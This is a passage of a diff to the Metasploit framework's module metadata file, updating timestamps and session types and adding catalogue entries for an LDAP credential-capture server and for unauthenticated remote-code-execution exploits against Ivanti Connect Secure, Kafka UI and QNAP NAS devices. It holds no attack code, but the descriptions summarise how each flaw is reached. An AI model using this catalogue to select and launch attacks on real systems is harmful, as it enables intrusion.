"sybase"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-12-12 09:53:37 +0000",
|
||||
"mod_time": "2024-02-19 16:10:37 +0000",
|
||||
"path": "/modules/auxiliary/scanner/mssql/mssql_login.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/mssql/mssql_login",
|
||||
@@ -46781,7 +46807,7 @@
|
||||
"sybase"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-12-12 09:53:37 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/auxiliary/scanner/mssql/mssql_schemadump.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/mssql/mssql_schemadump",
|
||||
@@ -46790,7 +46816,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"mssql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -46825,7 +46853,7 @@
|
||||
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-10-12 17:39:47 +0000",
|
||||
"mod_time": "2024-02-05 16:45:52 +0000",
|
||||
"path": "/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/mysql/mysql_authbypass_hashdump",
|
||||
@@ -46867,7 +46895,7 @@
|
||||
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-08-17 19:07:28 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/auxiliary/scanner/mysql/mysql_file_enum.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/mysql/mysql_file_enum",
|
||||
@@ -46876,7 +46904,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"mysql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -46908,7 +46938,7 @@
|
||||
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2021-09-07 10:01:17 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/auxiliary/scanner/mysql/mysql_hashdump.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/mysql/mysql_hashdump",
|
||||
@@ -46917,7 +46947,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"mysql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -46949,7 +46981,7 @@
|
||||
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-17 15:35:47 +0000",
|
||||
"mod_time": "2024-02-16 19:20:02 +0000",
|
||||
"path": "/modules/auxiliary/scanner/mysql/mysql_login.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/mysql/mysql_login",
|
||||
@@ -46990,7 +47022,7 @@
|
||||
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2017-07-24 06:26:21 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/auxiliary/scanner/mysql/mysql_schemadump.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/mysql/mysql_schemadump",
|
||||
@@ -46999,7 +47031,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"mysql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -47031,7 +47065,7 @@
|
||||
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2017-07-24 06:26:21 +0000",
|
||||
"mod_time": "2024-02-14 15:26:34 +0000",
|
||||
"path": "/modules/auxiliary/scanner/mysql/mysql_version.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/mysql/mysql_version",
|
||||
@@ -47040,7 +47074,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"mysql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -47072,7 +47108,7 @@
|
||||
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-08-17 19:07:28 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/auxiliary/scanner/mysql/mysql_writable_dirs.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/mysql/mysql_writable_dirs",
|
||||
@@ -47081,7 +47117,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"mysql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -49054,7 +49092,7 @@
|
||||
"postgres"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2017-07-24 06:26:21 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/auxiliary/scanner/postgres/postgres_hashdump.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/postgres/postgres_hashdump",
|
||||
@@ -49063,7 +49101,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"postgresql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -49097,7 +49137,7 @@
|
||||
"postgres"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-30 16:38:00 +0000",
|
||||
"mod_time": "2024-02-14 12:20:06 +0000",
|
||||
"path": "/modules/auxiliary/scanner/postgres/postgres_login.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/postgres/postgres_login",
|
||||
@@ -49138,7 +49178,7 @@
|
||||
"postgres"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-15 15:21:13 +0000",
|
||||
"mod_time": "2024-02-02 14:26:43 +0000",
|
||||
"path": "/modules/auxiliary/scanner/postgres/postgres_schemadump.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/postgres/postgres_schemadump",
|
||||
@@ -49148,7 +49188,7 @@
|
||||
"notes": {
|
||||
},
|
||||
"session_types": [
|
||||
"PostgreSQL"
|
||||
"postgresql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
@@ -49181,7 +49221,7 @@
|
||||
"postgres"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2022-01-23 15:28:32 +0000",
|
||||
"mod_time": "2024-02-14 15:26:34 +0000",
|
||||
"path": "/modules/auxiliary/scanner/postgres/postgres_version.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/postgres/postgres_version",
|
||||
@@ -49190,7 +49230,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"postgresql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -53161,7 +53203,7 @@
|
||||
"microsoft-ds"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-11-30 14:07:03 +0000",
|
||||
"mod_time": "2024-02-02 14:26:43 +0000",
|
||||
"path": "/modules/auxiliary/scanner/smb/pipe_auditor.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/smb/pipe_auditor",
|
||||
@@ -53171,7 +53213,7 @@
|
||||
"notes": {
|
||||
},
|
||||
"session_types": [
|
||||
"SMB"
|
||||
"smb"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
@@ -53206,7 +53248,7 @@
|
||||
"microsoft-ds"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-11-30 14:07:03 +0000",
|
||||
"mod_time": "2024-02-02 14:26:43 +0000",
|
||||
"path": "/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/smb/pipe_dcerpc_auditor",
|
||||
@@ -53216,7 +53258,7 @@
|
||||
"notes": {
|
||||
},
|
||||
"session_types": [
|
||||
"SMB"
|
||||
"smb"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
@@ -53302,7 +53344,7 @@
|
||||
"microsoft-ds"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-12-05 14:15:28 +0000",
|
||||
"mod_time": "2024-02-02 14:26:43 +0000",
|
||||
"path": "/modules/auxiliary/scanner/smb/smb_enum_gpp.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/smb/smb_enum_gpp",
|
||||
@@ -53312,7 +53354,7 @@
|
||||
"notes": {
|
||||
},
|
||||
"session_types": [
|
||||
"SMB"
|
||||
"smb"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
@@ -53352,7 +53394,7 @@
|
||||
"microsoft-ds"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-11-30 14:07:03 +0000",
|
||||
"mod_time": "2024-02-02 14:26:43 +0000",
|
||||
"path": "/modules/auxiliary/scanner/smb/smb_enumshares.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/smb/smb_enumshares",
|
||||
@@ -53362,7 +53404,7 @@
|
||||
"notes": {
|
||||
},
|
||||
"session_types": [
|
||||
"SMB"
|
||||
"smb"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
@@ -53397,7 +53439,7 @@
|
||||
"microsoft-ds"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-11-30 14:07:03 +0000",
|
||||
"mod_time": "2024-02-02 14:26:43 +0000",
|
||||
"path": "/modules/auxiliary/scanner/smb/smb_enumusers.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/smb/smb_enumusers",
|
||||
@@ -53407,7 +53449,7 @@
|
||||
"notes": {
|
||||
},
|
||||
"session_types": [
|
||||
"SMB"
|
||||
"smb"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
@@ -53443,7 +53485,7 @@
|
||||
"microsoft-ds"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-11-30 14:07:03 +0000",
|
||||
"mod_time": "2024-02-02 14:26:43 +0000",
|
||||
"path": "/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/smb/smb_enumusers_domain",
|
||||
@@ -53453,7 +53495,7 @@
|
||||
"notes": {
|
||||
},
|
||||
"session_types": [
|
||||
"SMB"
|
||||
"smb"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
@@ -53491,7 +53533,7 @@
|
||||
"microsoft-ds"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-30 16:38:00 +0000",
|
||||
"mod_time": "2024-02-06 15:06:25 +0000",
|
||||
"path": "/modules/auxiliary/scanner/smb/smb_login.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/smb/smb_login",
|
||||
@@ -53534,7 +53576,7 @@
|
||||
"microsoft-ds"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-11-30 14:07:03 +0000",
|
||||
"mod_time": "2024-02-02 14:26:43 +0000",
|
||||
"path": "/modules/auxiliary/scanner/smb/smb_lookupsid.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/smb/smb_lookupsid",
|
||||
@@ -53544,7 +53586,7 @@
|
||||
"notes": {
|
||||
},
|
||||
"session_types": [
|
||||
"SMB"
|
||||
"smb"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
@@ -58105,6 +58147,59 @@
|
||||
}
|
||||
]
|
||||
},
|
||||
"auxiliary_server/capture/ldap": {
|
||||
"name": "Authentication Capture: LDAP",
|
||||
"fullname": "auxiliary/server/capture/ldap",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "auxiliary",
|
||||
"author": [
|
||||
"JustAnda7"
|
||||
],
|
||||
"description": "This module mocks an LDAP service to capture authentication\n information of a client trying to authenticate against an LDAP service",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "",
|
||||
"arch": "",
|
||||
"rport": null,
|
||||
"autofilter_ports": [
|
||||
|
||||
],
|
||||
"autofilter_services": [
|
||||
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-23 12:13:24 +0000",
|
||||
"path": "/modules/auxiliary/server/capture/ldap.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "server/capture/ldap",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
"Stability": [
|
||||
|
||||
],
|
||||
"Reliability": [
|
||||
|
||||
],
|
||||
"SideEffects": [
|
||||
|
||||
]
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
{
|
||||
"name": "Capture",
|
||||
"description": "Run an LDAP capture server"
|
||||
}
|
||||
]
|
||||
},
|
||||
"auxiliary_server/capture/mssql": {
|
||||
"name": "Authentication Capture: MSSQL",
|
||||
"fullname": "auxiliary/server/capture/mssql",
|
||||
@@ -61592,6 +61687,40 @@
|
||||
|
||||
]
|
||||
},
|
||||
"encoder_cmd/base64": {
|
||||
"name": "Base64 Command Encoder",
|
||||
"fullname": "encoder/cmd/base64",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 400,
|
||||
"disclosure_date": null,
|
||||
"type": "encoder",
|
||||
"author": [
|
||||
"Spencer McIntyre"
|
||||
],
|
||||
"description": "This encoder uses base64 encoding to avoid bad characters.",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "BSD,BSDi,Linux,OSX,Solaris,Unix",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-02-12 14:02:51 +0000",
|
||||
"path": "/modules/encoders/cmd/base64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/base64",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false
|
||||
},
|
||||
"encoder_cmd/brace": {
|
||||
"name": "Bash Brace Expansion Command Encoder",
|
||||
"fullname": "encoder/cmd/brace",
|
||||
@@ -66642,14 +66771,18 @@
|
||||
"type": "exploit",
|
||||
"author": [
|
||||
"Alvaro Muñoz",
|
||||
"wvu <wvu@metasploit.com>"
|
||||
"wvu <wvu@metasploit.com>",
|
||||
"h00die"
|
||||
],
|
||||
"description": "This module exploits a Java deserialization vulnerability in Apache\n OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for\n versions prior to 17.12.04.",
|
||||
"description": "This module exploits a Java deserialization vulnerability in Apache\n OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for\n versions prior to 17.12.01 using the ROME gadget chain.\n\n Versions up to 18.12.11 are exploitable utilizing an auth bypass CVE-2023-51467\n and use the CommonsBeanutils1 gadget chain.\n\n Verified working on 18.12.09, 17.12.01, and 15.12",
|
||||
"references": [
|
||||
"CVE-2020-9496",
|
||||
"CVE-2023-49070",
|
||||
"CVE-2023-51467",
|
||||
"URL-https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz",
|
||||
"URL-https://ofbiz.apache.org/release-notes-17.12.04.html",
|
||||
"URL-https://issues.apache.org/jira/browse/OFBIZ-11716"
|
||||
"URL-https://issues.apache.org/jira/browse/OFBIZ-11716",
|
||||
"URL-https://blog.sonicwall.com/en-us/2023/12/sonicwall-discovers-critical-apache-ofbiz-zero-day-authbiz/"
|
||||
],
|
||||
"platform": "Linux,Unix",
|
||||
"arch": "cmd, x86, x64",
|
||||
@@ -66673,7 +66806,7 @@
|
||||
"Unix Command",
|
||||
"Linux Dropper"
|
||||
],
|
||||
"mod_time": "2021-03-31 08:54:37 +0000",
|
||||
"mod_time": "2024-02-06 16:45:02 +0000",
|
||||
"path": "/modules/exploits/linux/http/apache_ofbiz_deserialization.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "linux/http/apache_ofbiz_deserialization",
|
||||
@@ -72858,6 +72991,70 @@
|
||||
"session_types": false,
|
||||
"needs_cleanup": null
|
||||
},
|
||||
"exploit_linux/http/ivanti_connect_secure_rce_cve_2024_21893": {
|
||||
"name": "Ivanti Connect Secure Unauthenticated Remote Code Execution",
|
||||
"fullname": "exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 600,
|
||||
"disclosure_date": "2024-01-31",
|
||||
"type": "exploit",
|
||||
"author": [
|
||||
"sfewer-r7"
|
||||
],
|
||||
"description": "This module chains a server side request forgery (SSRF) vulnerability (CVE-2024-21893) and a command injection\n vulnerability (CVE-2024-21887) to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti\n Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and\n 22.x are vulnerable, prior to the vendor patch released on Feb 1, 2024. It is unknown if unsupported versions\n 8.x and below are also vulnerable.",
|
||||
"references": [
|
||||
"CVE-2024-21893",
|
||||
"CVE-2023-36661",
|
||||
"CVE-2024-21887",
|
||||
"URL-https://attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis",
|
||||
"URL-https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis",
|
||||
"URL-https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure",
|
||||
"URL-https://shibboleth.net/community/advisories/secadv_20230612.txt"
|
||||
],
|
||||
"platform": "Linux,Unix",
|
||||
"arch": "cmd",
|
||||
"rport": 443,
|
||||
"autofilter_ports": [
|
||||
80,
|
||||
8080,
|
||||
443,
|
||||
8000,
|
||||
8888,
|
||||
8880,
|
||||
8008,
|
||||
3000,
|
||||
8443
|
||||
],
|
||||
"autofilter_services": [
|
||||
"http",
|
||||
"https"
|
||||
],
|
||||
"targets": [
|
||||
"Automatic"
|
||||
],
|
||||
"mod_time": "2024-02-09 09:26:08 +0000",
|
||||
"path": "/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2024_21893.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "linux/http/ivanti_connect_secure_rce_cve_2024_21893",
|
||||
"check": true,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
"Stability": [
|
||||
"crash-safe"
|
||||
],
|
||||
"Reliability": [
|
||||
"repeatable-session"
|
||||
],
|
||||
"SideEffects": [
|
||||
"ioc-in-logs"
|
||||
]
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": null
|
||||
},
|
||||
"exploit_linux/http/ivanti_csa_unauth_rce_cve_2021_44529": {
|
||||
"name": "Ivanti Cloud Services Appliance (CSA) Command Injection",
|
||||
"fullname": "exploit/linux/http/ivanti_csa_unauth_rce_cve_2021_44529",
|
||||
@@ -73050,6 +73247,68 @@
|
||||
"session_types": false,
|
||||
"needs_cleanup": null
|
||||
},
|
||||
"exploit_linux/http/kafka_ui_unauth_rce_cve_2023_52251": {
|
||||
"name": "Kafka UI Unauthenticated Remote Command Execution via the Groovy Filter option.",
|
||||
"fullname": "exploit/linux/http/kafka_ui_unauth_rce_cve_2023_52251",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 600,
|
||||
"disclosure_date": "2023-09-27",
|
||||
"type": "exploit",
|
||||
"author": [
|
||||
"h00die-gr3y <h00die.gr3y@gmail.com>",
|
||||
"BobTheShopLifter and Thingstad"
|
||||
],
|
||||
"description": "A command injection vulnerability exists in Kafka ui between `v0.4.0` and `v0.7.1` allowing\n an attacker to inject and execute arbitrary shell commands via the `groovy` filter parameter\n at the `topic` section.",
|
||||
"references": [
|
||||
"CVE-2023-52251",
|
||||
"URL-https://attackerkb.com/topics/ATJ1hTVB8H/cve-2023-52251",
|
||||
"URL-https://github.com/BobTheShoplifter/CVE-2023-52251-POC"
|
||||
],
|
||||
"platform": "Linux,Unix",
|
||||
"arch": "cmd, x64, x86",
|
||||
"rport": 8080,
|
||||
"autofilter_ports": [
|
||||
80,
|
||||
8080,
|
||||
443,
|
||||
8000,
|
||||
8888,
|
||||
8880,
|
||||
8008,
|
||||
3000,
|
||||
8443
|
||||
],
|
||||
"autofilter_services": [
|
||||
"http",
|
||||
"https"
|
||||
],
|
||||
"targets": [
|
||||
"Unix/Linux Command"
|
||||
],
|
||||
"mod_time": "2024-02-14 21:33:50 +0000",
|
||||
"path": "/modules/exploits/linux/http/kafka_ui_unauth_rce_cve_2023_52251.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "linux/http/kafka_ui_unauth_rce_cve_2023_52251",
|
||||
"check": true,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
"Stability": [
|
||||
"crash-safe"
|
||||
],
|
||||
"Reliability": [
|
||||
"repeatable-session"
|
||||
],
|
||||
"SideEffects": [
|
||||
"ioc-in-logs",
|
||||
"artifacts-on-disk"
|
||||
]
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": null
|
||||
},
|
||||
"exploit_linux/http/kaltura_unserialize_cookie_rce": {
|
||||
"name": "Kaltura Remote PHP Code Execution over Cookie",
|
||||
"fullname": "exploit/linux/http/kaltura_unserialize_cookie_rce",
|
||||
@@ -77573,6 +77832,68 @@
|
||||
"session_types": false,
|
||||
"needs_cleanup": null
|
||||
},
|
||||
"exploit_linux/http/qnap_qts_rce_cve_2023_47218": {
|
||||
"name": "QNAP QTS and QuTS Hero Unauthenticated Remote Code Execution in quick.cgi",
|
||||
"fullname": "exploit/linux/http/qnap_qts_rce_cve_2023_47218",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 600,
|
||||
"disclosure_date": "2024-02-13",
|
||||
"type": "exploit",
|
||||
"author": [
|
||||
"sfewer-r7",
|
||||
"Spencer McIntyre",
|
||||
"jheysel-r7"
|
||||
],
|
||||
"description": "There exists an unauthenticated command injection vulnerability in the QNAP operating system known as QTS and\n QuTS hero. QTS is a core part of the firmware for numerous QNAP entry and mid-level Network Attached Storage\n (NAS) devices, and QuTS hero is a core part of the firmware for numerous QNAP high-end and enterprise NAS devices.\n\n The vulnerable endpoint is the quick.cgi component, exposed by the device’s web based administration feature.\n The quick.cgi component is present in an uninitialized QNAP NAS device. This component is intended to be used\n during either manual or cloud based provisioning of a QNAP NAS device. Once a device has been successfully\n initialized, the quick.cgi component is disabled on the system.\n\n An attacker with network access to an uninitialized QNAP NAS device may perform unauthenticated command\n injection, allowing the attacker to execute arbitrary commands on the device.",
|
||||
"references": [
|
||||
"CVE-2023-47218",
|
||||
"URL-https://www.qnap.com/en/security-advisory/qsa-23-57",
|
||||
"URL-https://www.rapid7.com/blog/post/2024/02/13/cve-2023-47218-qnap-qts-and-quts-hero-unauthenticated-command-injection-fixed"
|
||||
],
|
||||
"platform": "Linux,Unix",
|
||||
"arch": "cmd",
|
||||
"rport": 80,
|
||||
"autofilter_ports": [
|
||||
80,
|
||||
8080,
|
||||
443,
|
||||
8000,
|
||||
8888,
|
||||
8880,
|
||||
8008,
|
||||
3000,
|
||||
8443
|
||||
],
|
||||
"autofilter_services": [
|
||||
"http",
|
||||
"https"
|
||||
],
|
||||
"targets": [
|
||||
"Default"
|
||||
],
|
||||
"mod_time": "2024-02-15 17:12:11 +0000",
|
||||
"path": "/modules/exploits/linux/http/qnap_qts_rce_cve_2023_47218.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "linux/http/qnap_qts_rce_cve_2023_47218",
|
||||
"check": true,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
"Stability": [
|
||||
"crash-safe"
|
||||
],
|
||||
"Reliability": [
|
||||
"repeatable-session"
|
||||
],
|
||||
"SideEffects": [
|
||||
"ioc-in-logs"
|
||||
]
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": true
|
||||
},
|
||||
"exploit_linux/http/raidsonic_nas_ib5220_exec_noauth": {
|
||||
"name": "Raidsonic NAS Devices Unauthenticated Remote Command Execution",
|
||||
"fullname": "exploit/linux/http/raidsonic_nas_ib5220_exec_noauth",
|
||||
@@ -86129,7 +86450,7 @@
|
||||
"systemd",
|
||||
"systemd user"
|
||||
],
|
||||
"mod_time": "2020-10-02 17:38:06 +0000",
|
||||
"mod_time": "2024-02-03 23:18:45 +0000",
|
||||
"path": "/modules/exploits/linux/local/service_persistence.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "linux/local/service_persistence",
|
||||
@@ -89753,7 +90074,7 @@
|
||||
"Linux x86",
|
||||
"Linux x86_64"
|
||||
],
|
||||
"mod_time": "2021-08-20 16:06:16 +0000",
|
||||
"mod_time": "2024-02-14 15:26:34 +0000",
|
||||
"path": "/modules/exploits/linux/postgres/postgres_payload.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "linux/postgres/postgres_payload",
|
||||
@@ -89762,8 +90083,13 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": null
|
||||
"session_types": [
|
||||
"postgresql"
|
||||
],
|
||||
"needs_cleanup": null,
|
||||
"actions": [
|
||||
|
||||
]
|
||||
},
|
||||
"exploit_linux/pptp/poptop_negative_read": {
|
||||
"name": "Poptop Negative Read Overflow",
|
||||
@@ -114429,7 +114755,7 @@
|
||||
"Windows",
|
||||
"Linux"
|
||||
],
|
||||
"mod_time": "2020-10-02 17:38:06 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/exploits/multi/mysql/mysql_udf_payload.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "multi/mysql/mysql_udf_payload",
|
||||
@@ -114438,8 +114764,13 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": null
|
||||
"session_types": [
|
||||
"mysql"
|
||||
],
|
||||
"needs_cleanup": null,
|
||||
"actions": [
|
||||
|
||||
]
|
||||
},
|
||||
"exploit_multi/ntp/ntp_overflow": {
|
||||
"name": "NTP Daemon readvar Buffer Overflow",
|
||||
@@ -114742,7 +115073,7 @@
|
||||
],
|
||||
"platform": "Linux,OSX,Unix,Windows",
|
||||
"arch": "cmd",
|
||||
"rport": 5432,
|
||||
"rport": null,
|
||||
"autofilter_ports": [
|
||||
5432
|
||||
],
|
||||
@@ -114755,7 +115086,7 @@
|
||||
"Windows - PowerShell (In-Memory)",
|
||||
"Windows (CMD)"
|
||||
],
|
||||
"mod_time": "2022-04-04 10:32:01 +0000",
|
||||
"mod_time": "2024-02-14 15:26:34 +0000",
|
||||
"path": "/modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "multi/postgres/postgres_copy_from_program_cmd_exec",
|
||||
@@ -114764,8 +115095,13 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": null
|
||||
"session_types": [
|
||||
"postgresql"
|
||||
],
|
||||
"needs_cleanup": null,
|
||||
"actions": [
|
||||
|
||||
]
|
||||
},
|
||||
"exploit_multi/postgres/postgres_createlang": {
|
||||
"name": "PostgreSQL CREATE LANGUAGE Execution",
|
||||
@@ -114789,7 +115125,7 @@
|
||||
],
|
||||
"platform": "Linux,OSX,Unix,Windows",
|
||||
"arch": "cmd",
|
||||
"rport": 5432,
|
||||
"rport": null,
|
||||
"autofilter_ports": [
|
||||
5432
|
||||
],
|
||||
@@ -114799,7 +115135,7 @@
|
||||
"targets": [
|
||||
"Automatic"
|
||||
],
|
||||
"mod_time": "2021-02-17 12:33:59 +0000",
|
||||
"mod_time": "2024-02-14 15:26:34 +0000",
|
||||
"path": "/modules/exploits/multi/postgres/postgres_createlang.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "multi/postgres/postgres_createlang",
|
||||
@@ -114808,8 +115144,13 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": null
|
||||
"session_types": [
|
||||
"postgresql"
|
||||
],
|
||||
"needs_cleanup": null,
|
||||
"actions": [
|
||||
|
||||
]
|
||||
},
|
||||
"exploit_multi/realserver/describe": {
|
||||
"name": "RealServer Describe Buffer Overflow",
|
||||
@@ -170203,7 +170544,7 @@
|
||||
"targets": [
|
||||
"Windows DLL Dropper"
|
||||
],
|
||||
"mod_time": "2023-06-16 08:32:41 +0000",
|
||||
"mod_time": "2024-02-07 11:20:12 +0000",
|
||||
"path": "/modules/exploits/windows/local/cve_2020_0787_bits_arbitrary_file_move.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "windows/local/cve_2020_0787_bits_arbitrary_file_move",
|
||||
@@ -170565,7 +170906,7 @@
|
||||
"targets": [
|
||||
"Windows DLL Dropper"
|
||||
],
|
||||
"mod_time": "2023-06-16 08:32:41 +0000",
|
||||
"mod_time": "2024-02-07 11:25:41 +0000",
|
||||
"path": "/modules/exploits/windows/local/cve_2020_17136.rb",
|
||||
"is_install_path": true,
|
||||
